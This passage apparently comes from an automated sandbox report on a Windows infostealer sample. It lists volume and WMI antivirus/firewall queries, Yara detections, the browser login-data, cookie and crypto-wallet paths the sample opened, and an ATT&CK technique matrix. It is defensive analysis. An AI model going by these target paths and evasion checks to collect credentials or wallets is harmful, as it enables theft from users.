                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Users\user\Desktop\Uv4EriqDCj.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeQueries volume information: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeQueries volume information: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1875529730.00000000065BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.Uv4EriqDCj.exe.39fa250.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Uv4EriqDCj.exe.448ade8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Uv4EriqDCj.exe.39fa250.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Uv4EriqDCj.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Uv4EriqDCj.exe.448ade8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.1907816017.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1859795881.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1751899883.000000000448A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1751899883.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1792920578.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1861981750.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Uv4EriqDCj.exe PID: 4340, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Uv4EriqDCj.exe PID: 7328, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: nXUcBcEOyROdbV.exe PID: 7484, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: nXUcBcEOyROdbV.exe PID: 7748, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                  Source: Yara matchFile source: 0.2.Uv4EriqDCj.exe.39fa250.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Uv4EriqDCj.exe.448ade8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Uv4EriqDCj.exe.39fa250.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Uv4EriqDCj.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Uv4EriqDCj.exe.448ade8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.1859795881.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1751899883.000000000448A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1751899883.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1792920578.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Uv4EriqDCj.exe PID: 4340, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Uv4EriqDCj.exe PID: 7328, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: nXUcBcEOyROdbV.exe PID: 7484, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: nXUcBcEOyROdbV.exe PID: 7748, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.Uv4EriqDCj.exe.39fa250.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Uv4EriqDCj.exe.448ade8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Uv4EriqDCj.exe.39fa250.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Uv4EriqDCj.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Uv4EriqDCj.exe.448ade8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.1907816017.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1859795881.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1751899883.000000000448A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1751899883.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1792920578.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1861981750.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Uv4EriqDCj.exe PID: 4340, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Uv4EriqDCj.exe PID: 7328, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: nXUcBcEOyROdbV.exe PID: 7484, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: nXUcBcEOyROdbV.exe PID: 7748, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                  Windows Management Instrumentation
                  1
                  Scheduled Task/Job
                  111
                  Process Injection
                  1
                  Masquerading
                  1
                  OS Credential Dumping
                  1
                  Query Registry
                  Remote Services1
                  Archive Collected Data
                  11
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  1
                  Scheduled Task/Job
                  11
                  Disable or Modify Tools
                  LSASS Memory331
                  Security Software Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  11
                  Non-Standard Port
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading
                  241
                  Virtualization/Sandbox Evasion
                  Security Account Manager1
                  Process Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Ingress Tool Transfer
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                  Process Injection
                  NTDS241
                  Virtualization/Sandbox Evasion
                  Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeylogging14
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                  Software Packing
                  Cached Domain Credentials1
                  File and Directory Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSync113
                  System Information Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
